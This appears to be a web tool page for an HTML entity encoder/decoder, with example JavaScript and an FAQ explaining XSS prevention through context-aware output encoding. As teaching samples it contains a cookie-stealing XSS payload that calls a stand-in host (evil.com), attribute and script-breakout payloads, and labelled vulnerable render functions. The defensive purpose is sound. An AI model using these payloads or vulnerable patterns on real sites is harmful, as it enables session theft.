XSS Prevention

HTML Entity Encoder & Decoder

Encode special characters to HTML entities for safe output in web pages, or decode HTML entities back to plain text. Supports named entities (such as &amp;) and numeric entities in decimal or hexadecimal form (such as &#38; or &#x26;). Free, instant, runs entirely in your browser.


// how to use

Four steps to encode or decode HTML entities.

01

Select mode

Choose Encode to convert special characters to HTML entities, or Decode to convert entities back to their characters.

02

Paste input

Paste the raw text you want to safely embed in HTML, or the entity-encoded string you need to decode. Output updates live.

03

Choose options

Select Encode special chars for the five critical characters, or Encode extended to also encode non-ASCII. Choose Named or Numeric entity format.

04

Copy output

Click Copy to copy the encoded HTML to your clipboard. Paste it into the template or code at the point where it will be rendered as HTML, not into the database: store the raw value and encode when you output it.
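The four steps above as working code, added here as an example; this is not the tool's own source, and the names encodeHtml, decodeHtml, extended and format are my own choices. It implements both options from step 3 (only the five special characters, or also every non-ASCII code point; named or numeric output) and a decoder that accepts named, decimal and hexadecimal references:

```javascript
// Added example, not the page's own implementation: an encoder/decoder with
// the same options as the tool above. Function and option names are mine.

// The five characters that can end a text run or a quoted attribute value.
// &#39; is used for the apostrophe even in "named" mode: &apos; exists only
// in HTML5, while &#39; is understood by every parser.
const SPECIAL = {
  '&': { named: '&amp;',  numeric: '&#38;' },
  '<': { named: '&lt;',   numeric: '&#60;' },
  '>': { named: '&gt;',   numeric: '&#62;' },
  '"': { named: '&quot;', numeric: '&#34;' },
  "'": { named: '&#39;',  numeric: '&#39;' },
};

// Named forms for the non-ASCII characters in the reference table below.
// Anything outside this map falls back to a numeric entity.
const NAMED_EXTENDED = {
  '\u00A0': 'nbsp',  '\u00A9': 'copy',  '\u00AE': 'reg',    '\u2122': 'trade',
  '\u2014': 'mdash', '\u2013': 'ndash', '\u2026': 'hellip',
  '\u00AB': 'laquo', '\u00BB': 'raquo', '\u2190': 'larr',   '\u2192': 'rarr',
};

// Encode. extended=false encodes only the five special characters;
// extended=true also encodes every non-ASCII code point. format is
// 'named' or 'numeric' (decimal).
function encodeHtml(text, { extended = false, format = 'named' } = {}) {
  let out = '';
  for (const ch of text) {               // iterates code points, so emoji stay whole
    const cp = ch.codePointAt(0);
    if (SPECIAL[ch]) {
      out += SPECIAL[ch][format];
    } else if (extended && cp > 0x7f) {
      const name = NAMED_EXTENDED[ch];
      out += format === 'named' && name ? `&${name};` : `&#${cp};`;
    } else {
      out += ch;
    }
  }
  return out;
}

// Reverse lookup for decoding: everything we emit, plus &apos;.
const NAME_TO_CHAR = new Map([
  ['amp', '&'], ['lt', '<'], ['gt', '>'], ['quot', '"'], ['apos', "'"],
]);
for (const [ch, name] of Object.entries(NAMED_EXTENDED)) NAME_TO_CHAR.set(name, ch);

// Decode &name;, &#decimal; and &#xhex; (case-insensitive x / hex digits).
// An unknown name or an impossible code point is left untouched, which is
// also what a browser renders.
function decodeHtml(text) {
  return text.replace(/&(?:#x([0-9a-f]+)|#([0-9]+)|([a-z][a-z0-9]*));/gi,
    (match, hex, dec, name) => {
      if (name !== undefined) {
        return NAME_TO_CHAR.has(name) ? NAME_TO_CHAR.get(name) : match;
      }
      const cp = hex !== undefined ? parseInt(hex, 16) : parseInt(dec, 10);
      return cp > 0 && cp <= 0x10ffff ? String.fromCodePoint(cp) : match;
    });
}

// Usage: encodeHtml('<b>Tom & Jerry</b>')                      -> '&lt;b&gt;Tom &amp; Jerry&lt;/b&gt;'
//        encodeHtml('\u00a9 2024', { extended: true })         -> '&copy; 2024'
//        encodeHtml('\u00a9', { extended: true, format: 'numeric' }) -> '&#169;'
//        decodeHtml('&lt;b&gt; &#38; &#x26;')                  -> '<b> & &'
```

The decoder only knows the names it can emit; a full HTML5 decoder needs the complete named character reference table (over two thousand entries), which is why browsers, not hand-written regexes, should be the reference for what an entity means.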

// html entity reference

Common HTML entities — character, named entity, and numeric entity forms.

Char | Description | Named Entity | Numeric Entity
& | Ampersand | &amp; | &#38;
< | Less than | &lt; | &#60;
> | Greater than | &gt; | &#62;
" | Double quote | &quot; | &#34;
' | Single quote / apostrophe | &#39; (&apos; is HTML5 only) | &#39;
(U+00A0) | Non-breaking space | &nbsp; | &#160;
© | Copyright sign | &copy; | &#169;
® | Registered trademark | &reg; | &#174;
™ | Trade mark sign | &trade; | &#8482;
— | Em dash | &mdash; | &#8212;
– | En dash | &ndash; | &#8211;
… | Horizontal ellipsis | &hellip; | &#8230;
« | Left double angle quotation | &laquo; | &#171;
» | Right double angle quotation | &raquo; | &#187;
← | Left arrow | &larr; | &#8592;
→ | Right arrow | &rarr; | &#8594;

What are HTML entities?

HTML entities are special textual codes that represent characters which would otherwise be misinterpreted as HTML markup, or characters that cannot be typed directly in plain ASCII. An entity starts with an ampersand (&) and ends with a semicolon (;). They come in two forms: named entities like &amp; (for the & character) that use a descriptive mnemonic, and numeric entities like &#38; or &#x26; that use the Unicode code point in decimal or hexadecimal.

Why use them? HTML reserves the characters <, >, &, ", and ' for its own syntax — they delimit tags, attribute values, and entity references. If you insert user-supplied text containing these characters directly into HTML without encoding, the browser may interpret them as markup rather than as literal text. At minimum this causes rendering bugs. At worst it enables cross-site scripting (XSS) attacks, one of the most prevalent web security vulnerabilities.

XSS prevention explained: An XSS attack occurs when an attacker injects malicious script into a web page that is then executed in the browsers of other users. For example, if a comment system stores and displays user input without encoding, an attacker can submit <script>document.location='https://evil.com/?c='+document.cookie</script> and every user who views that comment will have their session cookie stolen. HTML encoding converts < to &lt; and > to &gt;, so the browser renders the text literally instead of executing it as code.

When to encode vs when not to: HTML entity encoding is the right tool when untrusted content lands in HTML text or inside a quoted attribute value. Other contexts need their own encoding first. A value placed inside a JavaScript string must be JavaScript-escaped (entities are not decoded inside a <script> block, so entity-encoding there corrupts the value without helping), and a value placed in a URL query parameter must be percent-encoded before the finished URL is entity-encoded as an attribute. Do not double-encode content that is already encoded, and do not encode data on its way into the database: store the raw value and encode at output time, for the context it is rendered in. Server-side templating engines such as Jinja2, Twig, Blade, ERB, and Thymeleaf can encode by default, but only when auto-escaping is on (plain Jinja2 has it off unless the application enables it, as Flask does for .html templates). Check the setting rather than assuming it, and treat any "raw" or "safe" filter as a place where the protection has been deliberately switched off.
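An added example, not part of the page, showing the per-context encoding choice described above in a server-side rendering function. The render functions, the escapeHtml helper and the attacker inputs are constructed for illustration; the comment payload is the one from the XSS explanation:

```javascript
// Added example, not the page's code: output encoding chosen per context.
// All sample values below are constructed attacker input, not real traffic.

// HTML entity encoding for text nodes and quoted attribute values.
const escapeHtml = (s) => String(s).replace(/[&<>"']/g,
  (c) => ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]));

// 1. HTML text context.
//    VULNERABLE: raw concatenation, the comment system from the explanation.
function renderCommentUnsafe(comment) {
  return `<p class="comment">${comment}</p>`;
}
//    FIXED: the database keeps the raw comment; encoding happens here, at output.
function renderComment(comment) {
  return `<p class="comment">${escapeHtml(comment)}</p>`;
}

// 2. Attribute context. Encoding only < and > is a common mistake: a value
//    such as  " onmouseover="alert(1)  needs no angle brackets to escape the
//    quotes and add an event handler.
function renderNameAngleOnly(name) {
  return `<input value="${name.replace(/</g, '&lt;').replace(/>/g, '&gt;')}">`;
}
function renderName(name) {
  return `<input value="${escapeHtml(name)}">`;   // always quote, always encode the quotes
}

// 3. JavaScript context. Entities are NOT decoded inside <script>, so entity
//    encoding would corrupt the value while </script> in it still closes the
//    block. Serialise as JSON and escape the HTML-significant characters.
function renderScriptData(value) {
  const json = JSON.stringify(value)
    .replace(/</g, '\\u003c').replace(/>/g, '\\u003e').replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028').replace(/\u2029/g, '\\u2029');
  return `<script>var data = ${json};</script>`;
}

// 4. URL parameter inside an attribute: percent-encode the parameter first,
//    then entity-encode the finished URL because it sits in an attribute.
function renderLink(path, nextParam) {
  const url = `${path}?next=${encodeURIComponent(nextParam)}`;
  return `<a href="${escapeHtml(url)}">continue</a>`;
}

// 5. Double encoding: encoding text that was already encoded on storage shows
//    a literal "&lt;" on the page instead of "<".
function doubleEncoded(raw) {
  return escapeHtml(escapeHtml(raw));
}

// Constructed attacker input for each context.
const payloads = {
  comment: '<script>document.location="https://evil.com/?c="+document.cookie</script>',
  name: '" onmouseover="alert(1)',
  script: '</script><script>alert(1)</script>',
  next: '/account?tab=1&x=<b>',
};

// Usage: renderComment(payloads.comment) contains no raw "<script>";
//        renderNameAngleOnly(payloads.name) still yields a live onmouseover attribute.
```

The lesson for a code review is that the question is never "is this value escaped?" but "is this value escaped for the place it is being written into?"; one helper per context, applied at the point of output, is what template engines with auto-escaping do for the HTML contexts, and what you still have to do by hand for script and URL contexts.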

// faq

Common questions about HTML entities and XSS prevention.

What are HTML entities?

HTML entities are codes used to represent characters that have special meaning in HTML or that cannot be directly included in HTML text. They begin with & and end with ;. Named entities like &amp; use a descriptive name; numeric entities like &#38; use the Unicode code point. Both decode to exactly the same character when rendered by a browser.

Why do I need to encode HTML special characters?

HTML uses <, >, &, ", and ' as structural syntax. If you insert text containing these characters directly into HTML without escaping, browsers parse them as markup. This causes broken layout and, critically, enables XSS attacks where injected <script> tags or injected event-handler attributes execute arbitrary code. Encoding these five characters into their entity equivalents is the minimum required for safe output in HTML text and quoted attribute values.

What is XSS and how does HTML encoding prevent it?

Cross-site scripting (XSS) is a vulnerability where an attacker injects malicious JavaScript into a page viewed by other users. For example, if a site displays a user-provided "name" without encoding and a malicious user sets their name to <script>stealData()</script>, that script runs in every visitor's browser. HTML encoding prevents this by converting < to &lt; and > to &gt;, making the browser display the literal text rather than interpret it as a script element.

What is the difference between named and numeric HTML entities?

Named entities use a human-readable name — &amp; for &, &lt; for <, &copy; for ©. Only a specific set of characters defined by the HTML specification has named entity forms. Numeric entities use the Unicode code point: decimal (&#38;) or hexadecimal (&#x26;). Numeric entities can represent any Unicode character. Both forms are semantically identical and produce the same rendered output in all browsers.

Should I encode all characters or just the dangerous ones?

In HTML text content and inside quoted attribute values, encoding the five critical characters (&, <, >, ", and ') is both necessary and sufficient. It is not sufficient on its own for unquoted attribute values or for JavaScript, CSS, and URL contexts, each of which has its own encoding rules. Encoding all non-ASCII characters as numeric entities is a useful extra step when the output may not be delivered as UTF-8, for example HTML email or legacy parsers, since a character-set mismatch changes how the bytes are interpreted. For modern UTF-8 web applications, encoding just the five dangerous characters in the HTML output context is the correct and recommended minimum. Always encode at output time, not storage time.
